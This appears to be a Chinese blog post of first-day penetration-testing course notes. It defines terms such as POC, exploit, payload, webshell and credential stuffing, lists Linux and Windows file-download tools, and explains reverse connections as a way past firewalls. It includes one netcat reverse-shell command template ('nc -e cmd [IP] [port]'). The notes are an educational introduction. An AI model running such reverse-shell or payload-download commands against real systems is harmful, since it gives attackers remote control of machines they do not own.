Day1 基础入门-操作系统&名词&文件下载&反弹shell&防火墙绕过

一、名词解析

POC:”Proof of Concept”  概念代码常指一段漏洞证明的代码

Exp:直接利用的漏洞,可以有攻击动作

前后端:前端通常指与用户可视,交互信息的一端,后端常为处理信息,做出响应的一端

Payload:有效载荷,指在漏洞利用后,真正在目标系统执行的代码或指令

Shellcode:payload的一种,常有正向、反向。

后门/Webshell:给进入系统的方式增加一道门,通常由攻击者上传,方便下次再进入,也有开发人员预留后面,方便日后维护。

木马/病毒:表面上正常但是运行时对系统造成损害的,例如控制系统权限、修改系统文件等。

反弹:防火墙对入站流量检测非常严格,但是对出站流量非常宽松,用受害机主动连接攻击机,让控制流量即变为出站流量。

回显:在客户端做出一些列动作后,服务器回显回来的消息,常见的如200,404,也有一些有用的错误信息。

跳板:一个具有辅助功能的机器,利用这台主机作为间接工具,攻击其他机器,与肉鸡连用

黑盒白盒测试:黑盒指无法看到源代码,在黑暗中进行测试,不断用工具猜测出大致代码;白盒指代码可见,在能看见代码情况下根据一些常见薄弱点、敏感函数进行测试。

暴力破解:排列组合,逐一尝试

社会工程学:利用人性的一些弱点。

撞库:利用收集的其他地方的用户信息和密码信息,生成对应的字典表,对该用户其他内容进行登陆尝试。

ATT&CK:MITRE ATT&CK®

案例实操

#基础案例 1:操作系统-用途&命令&权限&用户&防火墙

1、个人计算机&服务器用机

Win10、win7、winxp&win2008 win2012

2、Windows&Linux 常见命令

web安全入门篇-渗透测试中常用的命令-CSDN博客

 

文件权限&服务权限&用户权限等

 

系统用户&用户组&服务用户等分类

 自带防火墙出站&入站规则策略协议

WAF:Web Application Firewall(针对于网站的防火墙,类似于安全狗,阿里云盾)

#实用案例 1:文件上传下载-解决无图形化&解决数据传输

Linux:wget 、curl 、python 、ruby 、perl 、java 等

Windows:PowerShell 、Certutil 、Bitsadmin 、msiexec 、mshta 、rundll32 等

#实用案例 2:反弹 Shell 命令-解决数据回显&解决数据通讯

useradd 用户名 passwd 用户名

测试 Linux 系统添加用户或修改密码命令交互回显问题

Nc用法

Nc -e cmd [IP] [port]   反弹cmd窗口权限

#结合案例 1:防火墙绕过-正向连接&反向连接&内网服务器

1、内网: 内网 -> xiaodi8

        xiaodi8 !-> 内网

2、防火墙: xiaodi8 <-> aliyun xiaodi8 (在没有防火墙时)

有防火墙后:

防火墙 -> aliyun

aliyun !-> xiaodi8 防火墙

防火墙入站检测严格,出站检测宽松

正向连接反向连接:基于某个参照,例如本机为攻击机(参照物),受害机主动连接即为反向连接,但是对于受害机主动发出即为主动连接

Pikachu

上传nc文件,叫exploit

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值